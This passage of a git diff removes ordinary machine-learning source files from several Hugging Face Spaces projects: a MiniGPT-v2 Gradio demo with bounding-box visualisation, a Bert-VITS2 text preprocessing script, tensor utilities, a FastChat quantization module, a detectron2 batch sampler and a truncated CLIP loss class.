    ') - except ValueError: - print('wrong string: ', string) - continue - bbox_list = string.split('') - flag = False - for bbox_string in bbox_list: - integers = re.findall(r'-?\d+', bbox_string) - if len(integers) == 4: - x0, y0, x1, y1 = int(integers[0]), int(integers[1]), int(integers[2]), int(integers[3]) - left = x0 / bounding_box_size * image_width - bottom = y0 / bounding_box_size * image_height - right = x1 / bounding_box_size * image_width - top = y1 / bounding_box_size * image_height - - entities[obj].append([left, bottom, right, top]) - - j += 1 - flag = True - if flag: - i += 1 - else: - integers = re.findall(r'-?\d+', generation) - - if len(integers) == 4: # it is refer - mode = 'single' - - entities = list() - x0, y0, x1, y1 = int(integers[0]), int(integers[1]), int(integers[2]), int(integers[3]) - left = x0 / bounding_box_size * image_width - bottom = y0 / bounding_box_size * image_height - right = x1 / bounding_box_size * image_width - top = y1 / bounding_box_size * image_height - entities.append([left, bottom, right, top]) - else: - # don't detect any valid bbox to visualize - return None, '' - - if len(entities) == 0: - return None, '' - - if isinstance(image, Image.Image): - image_h = image.height - image_w = image.width - image = np.array(image) - - elif isinstance(image, str): - if os.path.exists(image): - pil_img = Image.open(image).convert("RGB") - image = np.array(pil_img)[:, :, [2, 1, 0]] - image_h = pil_img.height - image_w = pil_img.width - else: - raise ValueError(f"invaild image path, {image}") - elif isinstance(image, torch.Tensor): - - image_tensor = image.cpu() - reverse_norm_mean = torch.tensor([0.48145466, 0.4578275, 0.40821073])[:, None, None] - reverse_norm_std = torch.tensor([0.26862954, 0.26130258, 0.27577711])[:, None, None] - image_tensor = image_tensor * reverse_norm_std + reverse_norm_mean - pil_img = T.ToPILImage()(image_tensor) - image_h = pil_img.height - image_w = pil_img.width - image = np.array(pil_img)[:, :, [2, 1, 
0]] - else: - raise ValueError(f"invaild image format, {type(image)} for {image}") - - indices = list(range(len(entities))) - - new_image = image.copy() - - previous_bboxes = [] - # size of text - text_size = 0.5 - # thickness of text - text_line = 1 # int(max(1 * min(image_h, image_w) / 512, 1)) - box_line = 2 - (c_width, text_height), _ = cv2.getTextSize("F", cv2.FONT_HERSHEY_COMPLEX, text_size, text_line) - base_height = int(text_height * 0.675) - text_offset_original = text_height - base_height - text_spaces = 2 - - # num_bboxes = sum(len(x[-1]) for x in entities) - used_colors = colors # random.sample(colors, k=num_bboxes) - - color_id = -1 - for entity_idx, entity_name in enumerate(entities): - if mode == 'single' or mode == 'identify': - bboxes = entity_name - bboxes = [bboxes] - else: - bboxes = entities[entity_name] - color_id += 1 - for bbox_id, (x1_norm, y1_norm, x2_norm, y2_norm) in enumerate(bboxes): - skip_flag = False - orig_x1, orig_y1, orig_x2, orig_y2 = int(x1_norm), int(y1_norm), int(x2_norm), int(y2_norm) - - color = used_colors[entity_idx % len(used_colors)] # tuple(np.random.randint(0, 255, size=3).tolist()) - new_image = cv2.rectangle(new_image, (orig_x1, orig_y1), (orig_x2, orig_y2), color, box_line) - - if mode == 'all': - l_o, r_o = box_line // 2 + box_line % 2, box_line // 2 + box_line % 2 + 1 - - x1 = orig_x1 - l_o - y1 = orig_y1 - l_o - - if y1 < text_height + text_offset_original + 2 * text_spaces: - y1 = orig_y1 + r_o + text_height + text_offset_original + 2 * text_spaces - x1 = orig_x1 + r_o - - # add text background - (text_width, text_height), _ = cv2.getTextSize(f" {entity_name}", cv2.FONT_HERSHEY_COMPLEX, text_size, - text_line) - text_bg_x1, text_bg_y1, text_bg_x2, text_bg_y2 = x1, y1 - ( - text_height + text_offset_original + 2 * text_spaces), x1 + text_width, y1 - - for prev_bbox in previous_bboxes: - if computeIoU((text_bg_x1, text_bg_y1, text_bg_x2, text_bg_y2), prev_bbox['bbox']) > 0.95 and \ - prev_bbox['phrase'] == 
entity_name: - skip_flag = True - break - while is_overlapping((text_bg_x1, text_bg_y1, text_bg_x2, text_bg_y2), prev_bbox['bbox']): - text_bg_y1 += (text_height + text_offset_original + 2 * text_spaces) - text_bg_y2 += (text_height + text_offset_original + 2 * text_spaces) - y1 += (text_height + text_offset_original + 2 * text_spaces) - - if text_bg_y2 >= image_h: - text_bg_y1 = max(0, image_h - (text_height + text_offset_original + 2 * text_spaces)) - text_bg_y2 = image_h - y1 = image_h - break - if not skip_flag: - alpha = 0.5 - for i in range(text_bg_y1, text_bg_y2): - for j in range(text_bg_x1, text_bg_x2): - if i < image_h and j < image_w: - if j < text_bg_x1 + 1.35 * c_width: - # original color - bg_color = color - else: - # white - bg_color = [255, 255, 255] - new_image[i, j] = (alpha * new_image[i, j] + (1 - alpha) * np.array(bg_color)).astype( - np.uint8) - - cv2.putText( - new_image, f" {entity_name}", (x1, y1 - text_offset_original - 1 * text_spaces), - cv2.FONT_HERSHEY_COMPLEX, text_size, (0, 0, 0), text_line, cv2.LINE_AA - ) - - previous_bboxes.append( - {'bbox': (text_bg_x1, text_bg_y1, text_bg_x2, text_bg_y2), 'phrase': entity_name}) - - if mode == 'all': - def color_iterator(colors): - while True: - for color in colors: - yield color - - color_gen = color_iterator(colors) - - # Add colors to phrases and remove

    - def colored_phrases(match): - phrase = match.group(1) - color = next(color_gen) - return f'{phrase}' - - generation = re.sub(r'{<\d+><\d+><\d+><\d+>}|', '', generation) - generation_colored = re.sub(r'

<p>(.*?)</p>

    ', colored_phrases, generation) - else: - generation_colored = '' - - pil_image = Image.fromarray(new_image) - return pil_image, generation_colored - - -def gradio_reset(chat_state, img_list, path_list): - if chat_state is not None: - chat_state.messages = [] - if img_list is not None: - img_list = [] - if isinstance(path_list, list): - for path in path_list: - os.remove(path) - path_list.clear() - return None, gr.update(value=None, interactive=True), gr.update(placeholder='Upload your image and chat', - interactive=True), chat_state, img_list - - -def image_upload_trigger(upload_flag, replace_flag, img_list): - # set the upload flag to true when receive a new image. - # if there is an old image (and old conversation), set the replace flag to true to reset the conv later. - upload_flag = 1 - if img_list: - replace_flag = 1 - return upload_flag, replace_flag - - -def example_trigger(text_input, image, upload_flag, replace_flag, img_list): - # set the upload flag to true when receive a new image. - # if there is an old image (and old conversation), set the replace flag to true to reset the conv later. - upload_flag = 1 - if img_list or replace_flag == 1: - replace_flag = 1 - - return upload_flag, replace_flag - - -def gradio_ask(user_message, chatbot, chat_state, gr_img, img_list, upload_flag, replace_flag, path_list): - if len(user_message) == 0: - text_box_show = 'Input should not be empty!' 
- else: - text_box_show = '' - - if isinstance(gr_img, dict): - gr_img, mask = gr_img['image'], gr_img['mask'] - else: - mask = None - - if '[identify]' in user_message: - # check if user provide bbox in the text input - integers = re.findall(r'-?\d+', user_message) - if len(integers) != 4: # no bbox in text - bbox = mask2bbox(mask) - user_message = user_message + bbox - - if chat_state is None: - chat_state = CONV_VISION.copy() - - if upload_flag: - if replace_flag: - chat_state = CONV_VISION.copy() # new image, reset everything - replace_flag = 0 - chatbot = [] - img_list = [] - llm_message = chat.upload_img(gr_img, chat_state, img_list) - upload_flag = 0 - - chat.ask(user_message, chat_state) - - chatbot = chatbot + [[user_message, None]] - - if '[identify]' in user_message: - visual_img, _ = visualize_all_bbox_together(gr_img, user_message) - if visual_img is not None: - file_path = save_tmp_img(visual_img) - # path_list.append(file_path) - chatbot = chatbot + [[(file_path,), None]] - - return text_box_show, chatbot, chat_state, img_list, upload_flag, replace_flag - - -def gradio_answer(chatbot, chat_state, img_list, temperature): - llm_message = chat.answer(conv=chat_state, - img_list=img_list, - temperature=temperature, - max_new_tokens=500, - max_length=2000)[0] - chatbot[-1][1] = llm_message - return chatbot, chat_state - - -def gradio_stream_answer(chatbot, chat_state, img_list, temperature): - if len(img_list) > 0: - if not isinstance(img_list[0], torch.Tensor): - chat.encode_img(img_list) - streamer = chat.stream_answer(conv=chat_state, - img_list=img_list, - temperature=temperature, - max_new_tokens=500, - max_length=2000) - output = '' - for new_output in streamer: - escapped = escape_markdown(new_output) - output += escapped - chatbot[-1][1] = output - yield chatbot, chat_state - print(output) - chat_state.messages[-1][1] = '
    ' - return chatbot, chat_state - - -def gradio_visualize(chatbot, gr_img, path_list): - if isinstance(gr_img, dict): - gr_img, mask = gr_img['image'], gr_img['mask'] - - unescaped = reverse_escape(chatbot[-1][1]) - visual_img, generation_color = visualize_all_bbox_together(gr_img, unescaped) - if visual_img is not None: - if len(generation_color): - chatbot[-1][1] = generation_color - file_path = save_tmp_img(visual_img) - # path_list.append(file_path) - chatbot = chatbot + [[None, (file_path,)]] - - return chatbot - - -def gradio_taskselect(idx): - prompt_list = [ - '', - '[grounding] describe this image in detail', - '[refer] ', - '[detection] ', - '[identify] what is this ', - '[vqa] ' - ] - instruct_list = [ - '**Hint:** Type in whatever you want', - '**Hint:** Send the command to generate a grounded image description', - '**Hint:** Type in a phrase about an object in the image and send the command', - '**Hint:** Type in a caption or phrase, and see object locations in the image', - '**Hint:** Draw a bounding box on the uploaded image then send the command. Click the "clear" botton on the top right of the image before redraw', - '**Hint:** Send a question to get a short answer', - ] - return prompt_list[idx], instruct_list[idx] - - - - -chat = Chat(model, vis_processor, device=device) - -title = """
<h1 align="center">MiniGPT-v2 Demo</h1>
    """ -description = 'Welcome to Our MiniGPT-v2 Chatbot Demo!' -# article = """

    """ -article = """

    """ - -introduction = ''' -For Abilities Involving Visual Grounding: -1. Grounding: CLICK **Send** to generate a grounded image description. -2. Refer: Input a referring object and CLICK **Send**. -3. Detection: Write a caption or phrase, and CLICK **Send**. -4. Identify: Draw the bounding box on the uploaded image window and CLICK **Send** to generate the bounding box. (CLICK "clear" button before re-drawing next time). -5. VQA: Input a visual question and CLICK **Send**. -6. No Tag: Input whatever you want and CLICK **Send** without any tagging - -You can also simply chat in free form! -''' - -text_input = gr.Textbox(placeholder='Upload your image and chat', interactive=True, show_label=False, container=False, - scale=8) -with gr.Blocks() as demo: - gr.Markdown(title) - # gr.Markdown(description) - gr.Markdown(article) - - with gr.Row(): - with gr.Column(scale=0.5): - image = gr.Image(type="pil", tool='sketch', brush_radius=20) - - temperature = gr.Slider( - minimum=0.1, - maximum=1.5, - value=0.6, - step=0.1, - interactive=True, - label="Temperature", - ) - - clear = gr.Button("Restart") - - gr.Markdown(introduction) - - with gr.Column(): - chat_state = gr.State(value=None) - img_list = gr.State(value=[]) - chatbot = gr.Chatbot(label='MiniGPT-v2') - - dataset = gr.Dataset( - components=[gr.Textbox(visible=False)], - samples=[['No Tag'], ['Grounding'], ['Refer'], ['Detection'], ['Identify'], ['VQA']], - type="index", - label='Task Shortcuts', - ) - task_inst = gr.Markdown('**Hint:** Upload your image and chat') - with gr.Row(): - text_input.render() - send = gr.Button("Send", variant='primary', size='sm', scale=1) - - upload_flag = gr.State(value=0) - replace_flag = gr.State(value=0) - path_list = gr.State(value=[]) - image.upload(image_upload_trigger, [upload_flag, replace_flag, img_list], [upload_flag, replace_flag]) - - with gr.Row(): - with gr.Column(): - gr.Examples(examples=[ - ["examples_v2/office.jpg", "[grounding] describe this image in detail", 
upload_flag, replace_flag, - img_list], - ["examples_v2/sofa.jpg", "[detection] sofas", upload_flag, replace_flag, img_list], - ["examples_v2/2000x1372_wmkn_0012149409555.jpg", "[refer] the world cup", upload_flag, replace_flag, - img_list], - ["examples_v2/KFC-20-for-20-Nuggets.jpg", "[identify] what is this {<4><50><30><65>}", upload_flag, - replace_flag, img_list], - ], inputs=[image, text_input, upload_flag, replace_flag, img_list], fn=example_trigger, - outputs=[upload_flag, replace_flag]) - with gr.Column(): - gr.Examples(examples=[ - ["examples_v2/glip_test.jpg", "[vqa] where should I hide in this room when playing hide and seek", - upload_flag, replace_flag, img_list], - ["examples_v2/float.png", "Please write a poem about the image", upload_flag, replace_flag, img_list], - ["examples_v2/thief.png", "Is the weapon fateful", upload_flag, replace_flag, img_list], - ["examples_v2/cockdial.png", "What might happen in this image in the next second", upload_flag, - replace_flag, img_list], - ], inputs=[image, text_input, upload_flag, replace_flag, img_list], fn=example_trigger, - outputs=[upload_flag, replace_flag]) - - dataset.click( - gradio_taskselect, - inputs=[dataset], - outputs=[text_input, task_inst], - show_progress="hidden", - postprocess=False, - queue=False, - ) - - text_input.submit( - gradio_ask, - [text_input, chatbot, chat_state, image, img_list, upload_flag, replace_flag, path_list], - [text_input, chatbot, chat_state, img_list, upload_flag, replace_flag], queue=False - ).success( - gradio_stream_answer, - [chatbot, chat_state, img_list, temperature], - [chatbot, chat_state] - ).success( - gradio_visualize, - [chatbot, image, path_list], - [chatbot], - queue=False, - ) - - send.click( - gradio_ask, - [text_input, chatbot, chat_state, image, img_list, upload_flag, replace_flag, path_list], - [text_input, chatbot, chat_state, img_list, upload_flag, replace_flag] - ).success( - gradio_stream_answer, - [chatbot, chat_state, img_list, temperature], - 
[chatbot, chat_state] - ).success( - gradio_visualize, - [chatbot, image, path_list], - [chatbot], - ) - - clear.click(gradio_reset, [chat_state, img_list, path_list], [chatbot, image, text_input, chat_state, img_list], queue=False) - -demo.launch(enable_queue=True) \ No newline at end of file diff --git a/spaces/XzJosh/LAPLACE-Bert-VITS2/preprocess_text.py b/spaces/XzJosh/LAPLACE-Bert-VITS2/preprocess_text.py deleted file mode 100644 index 5eb0f3b9e929fcbe91dcbeb653391227a2518a15..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/LAPLACE-Bert-VITS2/preprocess_text.py +++ /dev/null @@ -1,64 +0,0 @@ -import json -from random import shuffle - -import tqdm -from text.cleaner import clean_text -from collections import defaultdict -stage = [1,2,3] - -transcription_path = 'filelists/genshin.list' -train_path = 'filelists/train.list' -val_path = 'filelists/val.list' -config_path = "configs/config.json" -val_per_spk = 4 -max_val_total = 8 - -if 1 in stage: - with open( transcription_path+'.cleaned', 'w', encoding='utf-8') as f: - for line in tqdm.tqdm(open(transcription_path, encoding='utf-8').readlines()): - try: - utt, spk, language, text = line.strip().split('|') - norm_text, phones, tones, word2ph = clean_text(text, language) - f.write('{}|{}|{}|{}|{}|{}|{}\n'.format(utt, spk, language, norm_text, ' '.join(phones), - " ".join([str(i) for i in tones]), - " ".join([str(i) for i in word2ph]))) - except Exception as error : - print("err!", utt, error) - -if 2 in stage: - spk_utt_map = defaultdict(list) - spk_id_map = {} - current_sid = 0 - - with open( transcription_path+'.cleaned', encoding='utf-8') as f: - for line in f.readlines(): - utt, spk, language, text, phones, tones, word2ph = line.strip().split('|') - spk_utt_map[spk].append(line) - if spk not in spk_id_map.keys(): - spk_id_map[spk] = current_sid - current_sid += 1 - train_list = [] - val_list = [] - - for spk, utts in spk_utt_map.items(): - shuffle(utts) - val_list+=utts[:val_per_spk] - 
train_list+=utts[val_per_spk:] - if len(val_list) > max_val_total: - train_list+=val_list[max_val_total:] - val_list = val_list[:max_val_total] - - with open( train_path,"w", encoding='utf-8') as f: - for line in train_list: - f.write(line) - - with open(val_path, "w", encoding='utf-8') as f: - for line in val_list: - f.write(line) - -if 3 in stage: - assert 2 in stage - config = json.load(open(config_path, encoding='utf-8')) - config["data"]['spk2id'] = spk_id_map - with open(config_path, 'w', encoding='utf-8') as f: - json.dump(config, f, indent=2, ensure_ascii=False) diff --git a/spaces/XzJosh/Taffy-Bert-VITS2/monotonic_align/core.py b/spaces/XzJosh/Taffy-Bert-VITS2/monotonic_align/core.py deleted file mode 100644 index dddc688d76172b880054e544b7a217acd013f14f..0000000000000000000000000000000000000000 --- a/spaces/XzJosh/Taffy-Bert-VITS2/monotonic_align/core.py +++ /dev/null @@ -1,35 +0,0 @@ -import numba - - -@numba.jit(numba.void(numba.int32[:,:,::1], numba.float32[:,:,::1], numba.int32[::1], numba.int32[::1]), nopython=True, nogil=True) -def maximum_path_jit(paths, values, t_ys, t_xs): - b = paths.shape[0] - max_neg_val=-1e9 - for i in range(int(b)): - path = paths[i] - value = values[i] - t_y = t_ys[i] - t_x = t_xs[i] - - v_prev = v_cur = 0.0 - index = t_x - 1 - - for y in range(t_y): - for x in range(max(0, t_x + y - t_y), min(t_x, y + 1)): - if x == y: - v_cur = max_neg_val - else: - v_cur = value[y-1, x] - if x == 0: - if y == 0: - v_prev = 0. 
- else: - v_prev = max_neg_val - else: - v_prev = value[y-1, x-1] - value[y, x] += max(v_prev, v_cur) - - for y in range(t_y - 1, -1, -1): - path[y, index] = 1 - if index != 0 and (index == y or value[y-1, index] < value[y-1, index-1]): - index = index - 1 diff --git a/spaces/Y-T-G/Blur-Anything/tracker/util/tensor_util.py b/spaces/Y-T-G/Blur-Anything/tracker/util/tensor_util.py deleted file mode 100644 index e02a65e7971ed307c0328533878cfd839d4eed53..0000000000000000000000000000000000000000 --- a/spaces/Y-T-G/Blur-Anything/tracker/util/tensor_util.py +++ /dev/null @@ -1,50 +0,0 @@ -import torch.nn.functional as F - - -def compute_tensor_iu(seg, gt): - intersection = (seg & gt).float().sum() - union = (seg | gt).float().sum() - - return intersection, union - - -def compute_tensor_iou(seg, gt): - intersection, union = compute_tensor_iu(seg, gt) - iou = (intersection + 1e-6) / (union + 1e-6) - - return iou - - -# STM -def pad_divide_by(in_img, d): - h, w = in_img.shape[-2:] - - if h % d > 0: - new_h = h + d - h % d - else: - new_h = h - if w % d > 0: - new_w = w + d - w % d - else: - new_w = w - lh, uh = int((new_h - h) / 2), int(new_h - h) - int((new_h - h) / 2) - lw, uw = int((new_w - w) / 2), int(new_w - w) - int((new_w - w) / 2) - pad_array = (int(lw), int(uw), int(lh), int(uh)) - out = F.pad(in_img, pad_array) - return out, pad_array - - -def unpad(img, pad): - if len(img.shape) == 4: - if pad[2] + pad[3] > 0: - img = img[:, :, pad[2] : -pad[3], :] - if pad[0] + pad[1] > 0: - img = img[:, :, :, pad[0] : -pad[1]] - elif len(img.shape) == 3: - if pad[2] + pad[3] > 0: - img = img[:, pad[2] : -pad[3], :] - if pad[0] + pad[1] > 0: - img = img[:, :, pad[0] : -pad[1]] - else: - raise NotImplementedError - return img diff --git a/spaces/Yiqin/ChatVID/model/__init__.py b/spaces/Yiqin/ChatVID/model/__init__.py deleted file mode 100644 index 1b8aa93b02dfe7a3d23d2d59001aa476a017aad4..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/__init__.py +++ 
/dev/null @@ -1,2 +0,0 @@ -from .Captioner import Captioner -from .Vicuna import VicunaHandler \ No newline at end of file diff --git a/spaces/Yiqin/ChatVID/model/fastchat/serve/compression.py b/spaces/Yiqin/ChatVID/model/fastchat/serve/compression.py deleted file mode 100644 index be8363ac34c17b9b354d1daa616536ecfeaaa0ec..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/fastchat/serve/compression.py +++ /dev/null @@ -1,138 +0,0 @@ -import dataclasses - -import torch -from torch import Tensor -import torch.nn as nn -from torch.nn import functional as F - - -@dataclasses.dataclass -class CompressionConfig: - """Group-wise quantization.""" - - num_bits: int - group_size: int - group_dim: int - symmetric: bool - enabled: bool = True - - -default_compression_config = CompressionConfig( - num_bits=8, group_size=256, group_dim=1, symmetric=True, enabled=True -) - - -class CLinear(nn.Module): - """Compressed Linear Layer.""" - - def __init__(self, weight, bias, device): - super().__init__() - - self.weight = compress(weight.data.to(device), default_compression_config) - self.bias = bias - - def forward(self, input: Tensor) -> Tensor: - weight = decompress(self.weight, default_compression_config) - return F.linear(input, weight, self.bias) - - -def compress_module(module, target_device): - for attr_str in dir(module): - target_attr = getattr(module, attr_str) - if type(target_attr) == torch.nn.Linear: - setattr( - module, - attr_str, - CLinear(target_attr.weight, target_attr.bias, target_device), - ) - for name, child in module.named_children(): - compress_module(child, target_device) - - -def compress(tensor, config): - """Simulate group-wise quantization.""" - if not config.enabled: - return tensor - - group_size, num_bits, group_dim, symmetric = ( - config.group_size, - config.num_bits, - config.group_dim, - config.symmetric, - ) - assert num_bits <= 8 - - original_shape = tensor.shape - num_groups = (original_shape[group_dim] + group_size - 1) 
// group_size - new_shape = ( - original_shape[:group_dim] - + (num_groups, group_size) - + original_shape[group_dim + 1 :] - ) - - # Pad - pad_len = (group_size - original_shape[group_dim] % group_size) % group_size - if pad_len != 0: - pad_shape = ( - original_shape[:group_dim] + (pad_len,) + original_shape[group_dim + 1 :] - ) - tensor = torch.cat( - [tensor, torch.zeros(pad_shape, dtype=tensor.dtype, device=tensor.device)], - dim=group_dim, - ) - data = tensor.view(new_shape) - - # Quantize - if symmetric: - B = 2 ** (num_bits - 1) - 1 - scale = B / torch.max(data.abs(), dim=group_dim + 1, keepdim=True)[0] - data = data * scale - data = data.clamp_(-B, B).round_().to(torch.int8) - return data, scale, original_shape - else: - B = 2**num_bits - 1 - mn = torch.min(data, dim=group_dim + 1, keepdim=True)[0] - mx = torch.max(data, dim=group_dim + 1, keepdim=True)[0] - - scale = B / (mx - mn) - data = data - mn - data.mul_(scale) - - data = data.clamp_(0, B).round_().to(torch.uint8) - return data, mn, scale, original_shape - - -def decompress(packed_data, config): - """Simulate group-wise dequantization.""" - if not config.enabled: - return packed_data - - group_size, num_bits, group_dim, symmetric = ( - config.group_size, - config.num_bits, - config.group_dim, - config.symmetric, - ) - - # Dequantize - if symmetric: - data, scale, original_shape = packed_data - data = data / scale - else: - data, mn, scale, original_shape = packed_data - data = data / scale - data.add_(mn) - - # Unpad - pad_len = (group_size - original_shape[group_dim] % group_size) % group_size - if pad_len: - padded_original_shape = ( - original_shape[:group_dim] - + (original_shape[group_dim] + pad_len,) - + original_shape[group_dim + 1 :] - ) - data = data.reshape(padded_original_shape) - indices = [slice(0, x) for x in original_shape] - return data[indices].contiguous() - else: - return data.view(original_shape) diff --git 
a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/samplers/grouped_batch_sampler.py b/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/samplers/grouped_batch_sampler.py deleted file mode 100644 index 5b247730aacd04dd0c752664acde3257c4eddd71..0000000000000000000000000000000000000000 --- a/spaces/Yiqin/ChatVID/model/vision/grit_src/third_party/CenterNet2/detectron2/data/samplers/grouped_batch_sampler.py +++ /dev/null @@ -1,47 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -import numpy as np -from torch.utils.data.sampler import BatchSampler, Sampler - - -class GroupedBatchSampler(BatchSampler): - """ - Wraps another sampler to yield a mini-batch of indices. - It enforces that the batch only contain elements from the same group. - It also tries to provide mini-batches which follows an ordering which is - as close as possible to the ordering from the original sampler. - """ - - def __init__(self, sampler, group_ids, batch_size): - """ - Args: - sampler (Sampler): Base sampler. - group_ids (list[int]): If the sampler produces indices in range [0, N), - `group_ids` must be a list of `N` ints which contains the group id of each sample. - The group ids must be a set of integers in the range [0, num_groups). - batch_size (int): Size of mini-batch. 
- """ - if not isinstance(sampler, Sampler): - raise ValueError( - "sampler should be an instance of " - "torch.utils.data.Sampler, but got sampler={}".format(sampler) - ) - self.sampler = sampler - self.group_ids = np.asarray(group_ids) - assert self.group_ids.ndim == 1 - self.batch_size = batch_size - groups = np.unique(self.group_ids).tolist() - - # buffer the indices of each group until batch size is reached - self.buffer_per_group = {k: [] for k in groups} - - def __iter__(self): - for idx in self.sampler: - group_id = self.group_ids[idx] - group_buffer = self.buffer_per_group[group_id] - group_buffer.append(idx) - if len(group_buffer) == self.batch_size: - yield group_buffer[:] # yield a copy of the list - del group_buffer[:] - - def __len__(self): - raise NotImplementedError("len() of GroupedBatchSampler is not well-defined.") diff --git a/spaces/YotamNitzan/domain-expansion/expansion_utils/clip_loss.py b/spaces/YotamNitzan/domain-expansion/expansion_utils/clip_loss.py deleted file mode 100644 index 475d2df3dfe537bf528c0bb50d94a0198f15994d..0000000000000000000000000000000000000000 --- a/spaces/YotamNitzan/domain-expansion/expansion_utils/clip_loss.py +++ /dev/null @@ -1,340 +0,0 @@ -# Based on a file from https://github.com/rinongal/StyleGAN-nada. - -# ========================================================================================== -# -# Adobe’s modifications are Copyright 2023 Adobe Research. All rights reserved. -# Adobe’s modifications are licensed under the Adobe Research License. To view a copy of the license, visit -# LICENSE.md. 
-# -# ========================================================================================== - -import clip -import torch -from torchvision.transforms import transforms -import numpy as np -from PIL import Image - -from expansion_utils.text_templates import imagenet_templates, part_templates - -# TODO: get rid of unused stuff in this class -class CLIPLoss(torch.nn.Module): - def __init__(self, device, lambda_direction=1., lambda_patch=0., lambda_global=0., lambda_manifold=0., - lambda_texture=0., patch_loss_type='mae', direction_loss_type='cosine', clip_model='ViT-B/32'): - super(CLIPLoss, self).__init__() - - self.device = device - self.model, clip_preprocess = clip.load(clip_model, device=self.device) - - self.clip_preprocess = clip_preprocess - - self.preprocess = transforms.Compose( - [transforms.Normalize(mean=[-1.0, -1.0, -1.0], - std=[2.0, 2.0, 2.0])] + # Un-normalize from [-1.0, 1.0] (GAN output) to [0, 1]. - clip_preprocess.transforms[:2] + # to match CLIP input scale assumptions - clip_preprocess.transforms[4:]) # + skip convert PIL to tensor - - self.target_directions_cache = {} - self.patch_text_directions = None - - self.patch_loss = DirectionLoss(patch_loss_type) - self.direction_loss = DirectionLoss(direction_loss_type) - self.patch_direction_loss = torch.nn.CosineSimilarity(dim=2) - - self.lambda_global = lambda_global - self.lambda_patch = lambda_patch - self.lambda_direction = lambda_direction - self.lambda_manifold = lambda_manifold - self.lambda_texture = lambda_texture - - self.src_text_features = None - self.target_text_features = None - self.angle_loss = torch.nn.L1Loss() - - self.model_cnn, preprocess_cnn = clip.load("RN50", device=self.device) - self.preprocess_cnn = transforms.Compose( - [transforms.Normalize(mean=[-1.0, -1.0, -1.0], - std=[2.0, 2.0, 2.0])] + # Un-normalize from [-1.0, 1.0] (GAN output) to [0, 1]. 
- preprocess_cnn.transforms[:2] + # to match CLIP input scale assumptions - preprocess_cnn.transforms[4:]) # + skip convert PIL to tensor - - self.model.requires_grad_(False) - self.model_cnn.requires_grad_(False) - - self.texture_loss = torch.nn.MSELoss() - - def tokenize(self, strings: list): - return clip.tokenize(strings).to(self.device) - - def encode_text(self, tokens: list) -> torch.Tensor: - return self.model.encode_text(tokens) - - def encode_images(self, images: torch.Tensor) -> torch.Tensor: - images = self.preprocess(images).to(self.device) - return self.model.encode_image(images) - - def encode_images_with_cnn(self, images: torch.Tensor) -> torch.Tensor: - images = self.preprocess_cnn(images).to(self.device) - return self.model_cnn.encode_image(images) - - def distance_with_templates(self, img: torch.Tensor, class_str: str, templates=imagenet_templates) -> torch.Tensor: - - text_features = self.get_text_features(class_str, templates) - image_features = self.get_image_features(img) - - similarity = image_features @ text_features.T - - return 1. 
- similarity - - def get_text_features(self, class_str: str, templates=imagenet_templates, norm: bool = True) -> torch.Tensor: - template_text = self.compose_text_with_templates(class_str, templates) - - tokens = clip.tokenize(template_text).to(self.device) - - text_features = self.encode_text(tokens).detach() - - if norm: - text_features /= text_features.norm(dim=-1, keepdim=True) - - return text_features - - def get_image_features(self, img: torch.Tensor, norm: bool = True) -> torch.Tensor: - image_features = self.encode_images(img) - - if norm: - image_features /= image_features.clone().norm(dim=-1, keepdim=True) - - return image_features - - def compute_text_direction(self, source_class: str, target_class: str) -> torch.Tensor: - with torch.no_grad(): - source_features = self.get_text_features(source_class) - target_features = self.get_text_features(target_class) - - text_direction = (target_features - source_features).mean(axis=0, keepdim=True) - text_direction /= text_direction.norm(dim=-1, keepdim=True) - - return text_direction - - def compute_img2img_direction(self, source_images: torch.Tensor, target_images: list) -> torch.Tensor: - with torch.no_grad(): - src_encoding = self.get_image_features(source_images) - src_encoding = src_encoding.mean(dim=0, keepdim=True) - - target_encodings = [] - for target_img in target_images: - preprocessed = self.clip_preprocess(Image.open(target_img)).unsqueeze(0).to(self.device) - - encoding = self.model.encode_image(preprocessed) - encoding /= encoding.norm(dim=-1, keepdim=True) - - target_encodings.append(encoding) - - target_encoding = torch.cat(target_encodings, axis=0) - target_encoding = target_encoding.mean(dim=0, keepdim=True) - - direction = target_encoding - src_encoding - direction /= direction.norm(dim=-1, keepdim=True) - - return direction - - def set_text_features(self, source_class: str, target_class: str) -> None: - source_features = self.get_text_features(source_class).mean(axis=0, keepdim=True) - 
self.src_text_features = source_features / source_features.norm(dim=-1, keepdim=True) - - target_features = self.get_text_features(target_class).mean(axis=0, keepdim=True) - self.target_text_features = target_features / target_features.norm(dim=-1, keepdim=True) - - def clip_angle_loss(self, src_img: torch.Tensor, source_class: str, target_img: torch.Tensor, - target_class: str) -> torch.Tensor: - if self.src_text_features is None: - self.set_text_features(source_class, target_class) - - cos_text_angle = self.target_text_features @ self.src_text_features.T - text_angle = torch.acos(cos_text_angle) - - src_img_features = self.get_image_features(src_img).unsqueeze(2) - target_img_features = self.get_image_features(target_img).unsqueeze(1) - - cos_img_angle = torch.clamp(target_img_features @ src_img_features, min=-1.0, max=1.0) - img_angle = torch.acos(cos_img_angle) - - text_angle = text_angle.unsqueeze(0).repeat(img_angle.size()[0], 1, 1) - cos_text_angle = cos_text_angle.unsqueeze(0).repeat(img_angle.size()[0], 1, 1) - - return self.angle_loss(cos_img_angle, cos_text_angle) - - def compose_text_with_templates(self, text: str, templates=imagenet_templates) -> list: - return [template.format(text) for template in templates] - - def clip_directional_loss(self, src_img: torch.Tensor, source_classes: np.ndarray, target_img: torch.Tensor, - target_classes: np.ndarray) -> torch.Tensor: - - target_directions = [] - for key in zip(source_classes, target_classes): - if key not in self.target_directions_cache.keys(): - new_direction = self.compute_text_direction(*key) - self.target_directions_cache[key] = new_direction - - target_directions.append(self.target_directions_cache[key]) - target_directions = torch.cat(target_directions) - - src_encoding = self.get_image_features(src_img) - target_encoding = self.get_image_features(target_img) - - edit_direction = (target_encoding - src_encoding) - if edit_direction.sum() == 0: - target_encoding = 
